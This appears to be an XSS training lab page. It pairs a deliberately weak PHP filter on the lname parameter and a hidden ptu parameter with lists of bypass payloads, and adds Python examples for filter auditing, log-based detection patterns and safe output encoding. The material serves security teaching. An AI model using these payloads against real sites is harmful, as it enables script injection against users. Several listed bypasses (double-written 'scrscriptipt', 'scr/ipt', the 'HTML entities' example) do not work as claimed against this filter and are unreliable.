Mixed Filtering XSS Lab

Test XSS with different filtering approaches in the same application

Mixed Filtering Challenge

Lab Overview

This lab demonstrates mixed security implementations where different parameters use different filtering approaches, creating a complex security landscape.

Mixed Implementation: The application uses different security controls for different parameters, creating potential security gaps.
Hidden Parameter: There's a hidden parameter not shown in the main form. Use tools like Arjun to discover it!
# use arjun tool to find hidden parameter
Parameter Security Levels:
  • fname - Secure: uses htmlspecialchars()
  • lname - Partial filter: replaces 'script' with '/'
  • ptu - Secure: uses htmlspecialchars()
  • Mixed: different filters for different parameters
Filter Demonstration:
Input: <script>alert(1)</script>
After lname filter: </>alert(1)</>
The 'script' string is replaced with '/', which can create interesting bypass opportunities.
Overall Security Level: Inconsistent Implementation

Objective: Test XSS payloads against the mixed filtering implementation and find ways to bypass the partial filter in the lname parameter.

Backend Source Code
<?php
// fname and lname are only rendered when both parameters are present
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    // fname: encoded with htmlspecialchars(); ENT_QUOTES also encodes single quotes
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    // lname: case-sensitive, single-pass replacement of the literal string 'script' with '/'
    $re = str_replace('script', '/', $_GET['lname']);
    echo $re;
}
elseif(isset($_GET["ptu"])){
    // ptu: the hidden parameter, encoded with htmlspecialchars()
    echo htmlspecialchars($_GET["ptu"], ENT_QUOTES);
}
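To see what each branch of that backend actually emits, the following is an added example (not the lab's own code): a Python re-implementation of the two filters, a small defender check that tells you whether anything tag-like survives in the rendered output, and an audit over constructed inputs taken from the payload strings listed on this page. Note that because both the opening and the closing tag contain the literal 'script', the page's sample input comes out as </>alert(1)<//>, and any input that does not contain the exact lowercase string 'script' passes through the lname path untouched.

```python
import html
import re

# Added example, not the lab's own code: Python mirror of the two filters in the PHP backend.


def lname_filter(value: str) -> str:
    """Mirror of str_replace('script', '/', $_GET['lname']): literal, case-sensitive, single pass."""
    return value.replace("script", "/")


def htmlspecialchars_ent_quotes(value: str) -> str:
    """Approximation of PHP htmlspecialchars($v, ENT_QUOTES): encodes & < > \" and '."""
    # html.escape emits &#x27; for a single quote; PHP emits &#039;, so normalise to PHP's form
    return html.escape(value, quote=True).replace("&#x27;", "&#039;")


def render(params: dict) -> str:
    """Same branch structure and output order as the lab backend."""
    if "fname" in params and "lname" in params:
        return htmlspecialchars_ent_quotes(params["fname"]) + lname_filter(params["lname"])
    if "ptu" in params:
        return htmlspecialchars_ent_quotes(params["ptu"])
    return ""


# '<', optional '/', then a letter: the shape a browser tokenises as a start or end tag
TAG_LIKE = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)


def tag_like_markup_survives(output: str) -> bool:
    """Defender check: does anything a browser would parse as a tag survive in the output?"""
    return TAG_LIKE.search(output) is not None


# Constructed sample inputs, copied from the payload strings listed on this page
SAMPLE_INPUTS = [
    "<script>alert(1)</script>",
    "<SCRIPT>alert(1)</SCRIPT>",
    "<img src=x onerror=alert(1)>",
    "<scrscriptipt>alert(1)</scrscriptipt>",
]


def audit(inputs=SAMPLE_INPUTS) -> dict:
    """Record, per input, what the lname path and the htmlspecialchars path emit."""
    report = {}
    for value in inputs:
        lname_out = lname_filter(value)
        safe_out = htmlspecialchars_ent_quotes(value)
        report[value] = {
            "lname_output": lname_out,
            "lname_tag_survives": tag_like_markup_survives(lname_out),
            "htmlspecialchars_output": safe_out,
            "htmlspecialchars_tag_survives": tag_like_markup_survives(safe_out),
        }
    return report


if __name__ == "__main__":
    for value, result in audit().items():
        print(f"{value!r}")
        print(f"  lname path          -> {result['lname_output']!r} "
              f"(tag survives: {result['lname_tag_survives']})")
        print(f"  htmlspecialchars    -> {result['htmlspecialchars_output']!r} "
              f"(tag survives: {result['htmlspecialchars_tag_survives']})")
```

The audit is the check to run whenever a parameter is "protected" by a string replacement rather than by output encoding: if tag_like_markup_survives() is ever true for a user-controlled value, the filter is not an output-encoding control and should not be counted as one.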
Test Input Forms
Visible Parameters (Mixed Filtering)
  • fname: this parameter uses htmlspecialchars() encoding
  • lname: this parameter replaces 'script' with '/' (case-sensitive)
Hidden Parameter
Hint: The 'ptu' parameter is not shown in the main form but is implemented in the backend.
  • ptu: this parameter uses htmlspecialchars() encoding
Bypass Techniques for Partial Filter
Case Variation Bypasses:
  • <SCRIPT>alert(1)</SCRIPT> - Uppercase
  • <Script>alert(1)</Script> - Capitalized
  • <ScRiPt>alert(1)</ScRiPt> - Mixed case
Alternative Tag Vectors:
  • <img src=x onerror=alert(1)> - Image error handler
  • <body onload=alert(1)> - Body load event
  • <svg onload=alert(1)> - SVG load event
Replacement Filter Exploitation:
  • <scrscriptipt>alert(1)</scrscriptipt> - Double writing
  • <scr/ipt>alert(1)</scr/ipt> - Using the replacement character
  • <scr"+"ipt>alert(1)</scr"+"ipt> - String concatenation
  • Try payloads where 'script' becomes valid HTML after replacement
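From the defender's side, the same variants listed above are what you want to spot in request logs when an application is known to rely on a case-sensitive replacement filter. The following is an added example, not part of this page's lab: a scanner that parses constructed common-log-format lines (not real traffic), URL-decodes every query parameter, and matches the indicators case-insensitively, which is exactly the normalisation the lab's filter lacks. The log lines, the /lab.php path and the IP addresses are all constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example, not the lab's code. Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /lab.php?fname=Ann&lname=Lee HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /lab.php?fname=Ann&lname=%3CSCRIPT%3Ealert(1)%3C/SCRIPT%3E HTTP/1.1" 200 540
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /lab.php?fname=Ann&lname=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 545
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /lab.php?ptu=%3Cscrscriptipt%3Ealert(1)%3C/scrscriptipt%3E HTTP/1.1" 200 530
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /lab.php?fname=Bob&lname=O%27Brien HTTP/1.1" 200 510
"""

# Common log format: client IP, identity, user, [timestamp], "METHOD target protocol", status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators derived from the variant families listed on this page. All are matched
# case-insensitively on the URL-decoded value, since the lab filter is case-sensitive
# and runs on decoded input, so a case change alone is enough to get past it.
INDICATORS = {
    "script_tag_any_case": re.compile(r"<\s*/?\s*script", re.I),
    "script_split_by_replacement": re.compile(r"<\s*/?\s*scr\W+ipt", re.I),   # <scr/ipt>
    "double_written_script": re.compile(r"scr\s*script\s*ipt", re.I),         # <scrscriptipt>
    "event_handler_attribute": re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I),      # onerror=, onload=
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "data_html_uri": re.compile(r"data:\s*text/html", re.I),
}


def scan_log(text: str) -> list:
    """Return one finding per (request, parameter, indicator) that matched."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group("target")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:  # parse_qs already percent-decodes each value
                for label, pattern in INDICATORS.items():
                    if pattern.search(value):
                        findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                         "param": name, "indicator": label, "value": value})
    return findings


def summarize_by_ip(findings: list) -> dict:
    """Count findings per client, the usual first cut for triage."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['ts']} param={f['param']} {f['indicator']}: {f['value']!r}")
    print(summarize_by_ip(scan_log(SAMPLE_LOG)))
```

Two points the sample deliberately exercises: the fourth line targets the hidden ptu parameter, so the scanner must look at every query parameter rather than only the ones in the visible form, and the last line (an apostrophe in a surname) produces no finding, which is the false-positive case a detection like this has to tolerate.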
Security Implications

Mixed filtering implementations create:

  • Inconsistent security controls across the application
  • False sense of security from partial filtering
  • Complex attack surface with different bypass techniques
  • Maintenance challenges for security teams
  • Difficulty in comprehensive security testing
  • Potential for overlooked vulnerabilities
Best Practices

For consistent security:

  • Use uniform output encoding across all parameters
  • Avoid partial or incomplete filtering
  • Implement Content Security Policy (CSP) headers
  • Use context-aware encoding for different output contexts
  • Conduct comprehensive security testing
  • Document all security controls and implementations
  • Use security headers: X-XSS-Protection, X-Content-Type-Options
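Putting the first, fourth and last of those practices together, the following is an added example (not the lab's code): a single rendering routine in which all three lab parameters go through the same encoder for their output context, URL-valued input is restricted to http(s) so that javascript: and data: URIs never reach an href, and every response carries a Content-Security-Policy and X-Content-Type-Options header. The 'site' parameter, the /lab.php-style page layout and the example.com URL are assumptions made for the example; the block sends no X-XSS-Protection header because current browsers no longer honour it, so CSP is the control to rely on.

```python
import html
from urllib.parse import urlsplit

# Added example, not the lab's code: one uniform, context-aware encoding policy for the
# lab's parameters plus the response headers. The 'site' parameter is hypothetical,
# included only to show URL-context handling alongside text-context encoding.

CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"


def escape_text(value: str) -> str:
    """HTML text and quoted-attribute context: encode & < > \" ' (the htmlspecialchars ENT_QUOTES set)."""
    return html.escape(value, quote=True)


def safe_href(value: str) -> str:
    """URL context: allow only http(s); any other scheme (javascript:, data:, ...) becomes '#'."""
    scheme = urlsplit(value.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return escape_text(value)  # still attribute-encoded once the scheme has been allowed


def response_headers() -> dict:
    """Headers applied to every response, independent of which parameters are present."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": CSP,
        "X-Content-Type-Options": "nosniff",
    }


def render_profile(params: dict) -> tuple:
    """Return (headers, body); every parameter goes through the encoder for its context."""
    parts = []
    if "fname" in params and "lname" in params:
        parts.append(f"<p>Name: {escape_text(params['fname'])} {escape_text(params['lname'])}</p>")
    if "ptu" in params:
        parts.append(f"<p>PTU: {escape_text(params['ptu'])}</p>")
    if "site" in params:  # hypothetical URL-valued parameter
        parts.append(f'<a href="{safe_href(params["site"])}">site</a>')
    body = "<!doctype html><html><body>" + "".join(parts) + "</body></html>"
    return response_headers(), body


def user_markup_leaked(params: dict, body: str) -> bool:
    """Check: does any parameter value containing '<' appear verbatim, unencoded, in the body?"""
    return any("<" in v and v in body for v in params.values())


if __name__ == "__main__":
    req = {"fname": "Ann", "lname": "<ScRiPt>alert(1)</ScRiPt>",
           "ptu": "<img src=x onerror=alert(1)>", "site": "javascript:alert(1)"}
    headers, body = render_profile(req)
    for k, v in headers.items():
        print(f"{k}: {v}")
    print()
    print(body)
    print("leaked:", user_markup_leaked(req, body))
```

The design point is that the decision of how to encode is made per output context (text, attribute, URL), never per parameter, so adding a new parameter later, hidden or not, cannot silently land in an unencoded branch the way ptu and lname diverge in the lab backend.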
Advanced Bypass Examples
Replacement Exploitation:
  • <scrscriptipt>alert(1)</scrscriptipt>
  • <scr/ipt>alert(1)</scr/ipt>
  • scrscriptipt:alert(1) - For JavaScript URLs
Alternative Execution Methods:
  • <img src=x onerror=alert(1)>
  • <svg onload=alert(1)>
  • <iframe src="javascript:alert(1)">
  • <object data="data:text/html,<script>alert(1)</script>">
Creative Bypass Techniques:
  • Use HTML entities: <script>alert(1)</script>
  • Use Unicode: <scr\u0069pt>alert(1)</scr\u0069pt>
  • Use data URIs: <object data="data:text/html,<script>alert(1)</script>">
  • Use JavaScript pseudo-protocol: javascript:alert(1)